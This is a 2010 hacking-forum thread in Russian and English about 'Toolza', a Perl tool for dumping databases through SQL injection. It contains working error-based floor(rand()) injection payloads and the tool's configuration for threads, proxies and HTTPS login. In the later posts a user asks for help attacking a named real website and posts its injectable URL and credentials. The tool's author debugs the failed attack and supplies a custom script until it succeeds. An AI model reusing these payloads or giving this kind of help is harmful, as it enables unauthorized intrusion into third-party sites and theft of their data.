Toolza 1.0

Discussion in 'PHP' started by Pashkela, 17 Oct 2009.

  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    прошу добавит фунцию типа select ... from ... where table_shema... тоесть не тока с текушего бд но и от остальных
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    в MySQL уже давным-давно добавлено

    update:

    NAME_CONST - get DB-names from information_schema.schemata
    NAME_CONST - get tables from DB-name
    NAME_CONST - get column_name from tables from DB-name
     
    #202 Pashkela, 15 Feb 2010
    Last edited: 15 Feb 2010
  3. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    Pashkela, прога как то странно себя ведет когда в нескольких базах уязвимого сайта есть таблицы с одним и тем же названием...тулза дампит данные только из какой-то одной...возможность выбора отсутствует...

    З.Ы переход на gui всё-таки не планируется?
     
    #203 daniel_1024, 15 Feb 2010
    Last edited: 15 Feb 2010
  4. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    ой сорри я сам не обновился ))
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    синтаксис такой

    ИМЯ_БД.ИМЯ_ТАБЛИЦЫ - и будет дампить откуда надо, если речь про пункт 7

    когда спросит Mysql=>5 если уже есть имя БД, то надо выбрать 0 (нет), чтобы не переопределяло имя базы (делается автоматически)

    gui не планируется

    UPDATE (17.02.2010):

    устранение серьезных багов по всему коду, код стал более стабильный и универсальный, перекачать в первом посте
     
    #205 Pashkela, 15 Feb 2010
    Last edited: 17 Feb 2010
  6. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    Pashkela, можешь переделать алгоритм сканера сайтов - чтобы он проходил по какому-то несуществующему адресу, тем самым узнавая дефолтную 404 страницу для сканируемого сайта, а затем уже сравнивал с нею всё остальное...тогда и файл с ошибками не нужен будет...
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:

    Для всех режимов работы - поддержка HTTPS+Authorization

    сделано на IO::Socket::SSL

    UBUNTU: sudo apt-get install libio-socket-ssl-perl
    WIN: install Net::SSLeay and IO::Socket::SSL
    + раскоментировать строчку 48

    новые переменные:

    $https_mode_auth = 1; # 1 - если нужна авторизация, 0 - нет
    $https_auth_script_path = "/login.php"; # путь до скрипта авторизации (начинается со слеша)
    $https_auth_post_data = "username=admin&passwd=sex"; # логин, пароль, название полей и etc., взять можно из Tamper Data (FireFox plugin) при авторизации на ресурсе

    автоматическое распознавание url, если https и авторегистрация, если есть данные
     
    1 person likes this.
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    update:

    MySql inj floor(rand()):

    Названо просто от балды, еще одна альтернатива Blind Mysql injection, но уже для 4.1<=Mysql=>5, т.к. использует стандартные функции для старых версий (можно сказать альтернатива name_const), основано на вызове той же ошибки Duplicate

    - Многопоточный
    - Post/Get/Cookies/Proxy & etc.
    - Все те же возможности, что и при обычной скуле + та же скорость

    скуля:
    Code:
    http://example.com/?id=1+or(1,2)=(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+
    
    переменные в скрипте:
    Code:
    $f_table = "information_schema.tables"; #  default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here 
    $f_url = "http://example.com/?id=1+or(1,2)="; # url
    $f_plus = "+"; # %20,%2b & etc.
    $f_filtr = "--+"; # close SQL
    
    PS: Приведу еще один пример, некоторые просто не вполне понимают возможности:

    скуля:
    Code:
    http://example.com/?id=(select+1+from+(select+count(*),concat((select+version()+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)a)--+
    
    переменные в скрипте:
    Code:
    $f_table = "information_schema.tables"; #  default 'information_schema.tables' if MySQL>=5 and if MySQL<5 - you must brute table_name before and print here 
    $f_url = "http://example.com/?id=(select+1+from+"; # url
    $f_plus = "+"; # %20,%2b & etc.
    $f_filtr = "a)--+"; # close SQL
    


    [1] floor(rand()) - system information\n";
    [2] floor(rand()) - get DB-names from information_schema.schemata\n";
    [3] floor(rand()) - get tables from DB-name\n";
    [4] floor(rand()) - get column_name from tables from DB-name\n";
    [5] floor(rand()) - get tables from information_schema (current DB)\n";
    [6] floor(rand()) - get column_name from table (current DB)\n";
    [7] floor(rand()) - get data from columns\n";
    [8] floor(rand()) - Mysql4 inj brute tables and columns\n";

    теперь с blind mysql4 можно работать как с обычной скулей

    Обновления в первом посте темы как обычно

    PS: + исправление мелких багов

    update 28.02.2010 - фикс багов
     
    #208 Pashkela, 24 Feb 2010
    Last edited: 2 Mar 2010
    1 person likes this.
  9. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    https - это огромный плюс.
    Остальное тоже на уровне.
    софтинка то что надо.
     
  10. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    вообще то на данный момент самый лучшый прога для слива бд. Жал что без GUI хотя бы до запуска самого дампа надо сделать интерфейс для настройки. Это реализовал кто то на World Fastest MD5 cracker BarsWF написав GUI (BarsWF launcher)
    [​IMG]
    правда та прога не на перле(знаю что оч гемор написать GUI для перл) но все таки по теме привел пример.
    Кстати sql_ocb_public от ачата тоже с GUI реализовано ))
     
  11. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    Pashkela бро пересмотри на тулзе функцию name_const и floor rand у обеих все норм выводит таблы но когда дело дойдет до колонок то придется по одному выводит а инфо с колонок а не несколько например user_id,username сразу не выводит
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    пример студию!

    PS: А вообще в некоторых случаях может быть ограничение длины строки запроса
     
  13. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    hello

    i want to injection in mysql vulnerable site

    http://www.milliontreeproject.co.uk/retailer.php?catid=-1+UNION+SELECT+1,2,3

    and 2 columns is printable field

    i am trying to get information of this site through Toolza i edit 1 line in toolza.pl

    i edit like this

    #########################################################################################################################################
    ## Основные настройки MySQL - вместо принтабельного поля поставьте " ^ " |MySql Basic options - print " ^ " instead of printable field #
    #########################################################################################################################################
    $source_sql = "http://www.milliontreeproject.co.uk/retailer.php?catid=-1+UNION+SELECT+1,^,3";
    $filtr = "--"; # close SQL
    $plus = "+"; # /**/,%20,%2b & etc.
    $limit = 0; # 0 - no limit; 1 - limit+0,1; 2 - limit+1,1
    $unhex = 0; # unhex(hex(DATA))); 0 - disable; 1 - enable
    $aes = 0; # AES_DECRYPT(AES_ENCRYPT(DATA),x071),x071); 0 - disable; 1 - enable
    $aes_key = "0x71"; # AES key

    and when i run toolza.pl and want to get information it get nothing and give like this only

    system information:

    Request method - Post
    Threads - 10
    proxy - no

    saved in z_www.milliontreeproject.co.uk.txt

    why i am not getting information ???

    please help me

    thank you
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    There is some trouble with parsing page via sockets, thanks for bug report, so new parameter in the script in global settings:

    $get_method = 1; # 0 - via IO::Socket, 1 - via LWP::Simple - if can't get DATA

    but be careful, proxies, socks are not supported in this case and only GET method supported

    download script from first post

    PS: $filtr = ""; # close SQL

    doesn't matter in the given concrete case, but be attentive
     
    #214 Pashkela, 16 Mar 2010
    Last edited: 16 Mar 2010
  15. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Hi

    can you please tell me where is download script from first post ???

    and where will i put this line ($get_method = 1; # 0 - via IO::Socket, 1 - via LWP::Simple)
    in global settings for all modes

    ##########################################################################
    ## Глобальные настройки для всех режимов | Global settings for all modes ##
    ###########################################################################
    $method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
    $use_proxy = 0; # 0 - без прокси; 1 - c прокси | 1 -Use proxy; 0 - No proxy
    $proxy = "proxy.txt"; # Файл с проксями | Proxy file
    $use_socks = 0; # 0 - без socks; 1 - c socks | 1 -Use socks; 0 - No socks
    $socks_file = "socks.txt";# Файл с SOCKS | SOCKS file (SOCKS4-5 supported, no authorization)
    $kol_threads = 10; # Кол-во потоков, рекомендуется -10 | Number of threads - 10 recommended
    $timeout = 10; # Таймаут в секундах | Timeout in seconds
    $cookie = ""; # Если кук нет - поставить "" | If no coockie set ""
    $https_mode_auth = 1; # 1 - whith authorization, 0 - no
    $https_auth_script_path = "/signin.php";
    $https_auth_post_data = "uname=watltd&passwd=drowssap&Submit=Sign+In";
    $referer = "http://google.com"; # Реферер, если нет поставить "" | If no referer set ""
    $user_agent = "Opera/9.25 (Windows NT 6.0; U; en)"; # Юзер агент, если нет поставить "" | If no user agent set ""
    $http_protocol = 1; # 0 - HTTP/1.0; 1 - HTTP/1.1; Default - 1
    $pause = 0; # Пауза между запросами в секундах | Pause between requests in seconds


    Thank you
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    #216 Pashkela, 16 Mar 2010
    Last edited: 16 Mar 2010
  17. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Hi

    still getting same error from using new version

    :(
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ))) script for you only ====> click
     
  19. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Hi

    Thank you very much

    now working perfect

    :)
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    thanks God )